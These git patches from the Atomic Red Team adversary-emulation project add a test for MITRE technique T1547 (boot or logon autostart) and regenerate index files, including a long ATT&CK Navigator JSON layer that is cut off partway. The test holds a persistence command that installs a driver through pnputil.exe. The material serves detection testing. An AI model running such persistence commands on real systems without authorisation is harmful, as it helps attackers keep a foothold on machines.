diff --git a/atomics/T1547/T1547.yaml b/atomics/T1547/T1547.yaml
new file mode 100644
index 00000000..c3fbc845
--- /dev/null
+++ b/atomics/T1547/T1547.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1547
+display_name: 'Boot or Logon Autostart Execution'
+atomic_tests:
+- name: Add a driver
+  description: |
+    Install a driver via pnputil.exe lolbin
+  supported_platforms:
+  - windows
+  input_arguments:
+    driver_inf:
+      description: A built-in, already installed windows driver inf
+      type: Path    
+      default: 'C:\Windows\INF\usbstor.inf'
+  executor:
+    command: |
+      pnputil.exe /add-driver "#{driver_inf}"
+    name: command_prompt

From 0f87abb8652746e3b210b13bcdb4b7fb047b4bc1 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 17:38:42 +0000
Subject: [PATCH 32/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1547/T1547.yaml | 1 +
 atomics/used_guids.txt   | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1547/T1547.yaml b/atomics/T1547/T1547.yaml
index c3fbc845..a9cab92e 100644
--- a/atomics/T1547/T1547.yaml
+++ b/atomics/T1547/T1547.yaml
@@ -2,6 +2,7 @@ attack_technique: T1547
 display_name: 'Boot or Logon Autostart Execution'
 atomic_tests:
 - name: Add a driver
+  auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
   description: |
     Install a driver via pnputil.exe lolbin
   supported_platforms:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index b8ce28f8..00099f88 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -898,3 +898,4 @@ e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
 93662494-5ed7-4454-a04c-8c8372808ac2
 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
 b2698b33-984c-4a1c-93bb-e4ba72a0babb
+cb01b3da-b0e7-4e24-bf6d-de5223526785

From 042bd99bdda5f6220566b75903e45957b200e827 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 17:38:48 +0000
Subject: [PATCH 33/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-windows.json          |  2 +-
 .../art-navigator-layer.json                  |  2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |  2 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  2 +
 atomics/Indexes/Indexes-Markdown/index.md     |  6 ++-
 .../Indexes/Indexes-Markdown/windows-index.md |  6 ++-
 atomics/Indexes/Matrices/matrix.md            |  4 +-
 atomics/Indexes/Matrices/windows-matrix.md    |  2 +-
 atomics/Indexes/index.yaml                    | 40 ++++++++++++++++-
 atomics/T1547/T1547.md                        | 44 +++++++++++++++++++
 10 files changed, 99 insertions(+), 11 deletions(-)
 create mode 100644 atomics/T1547/T1547.md

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 6cc97475..8fa94501 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View 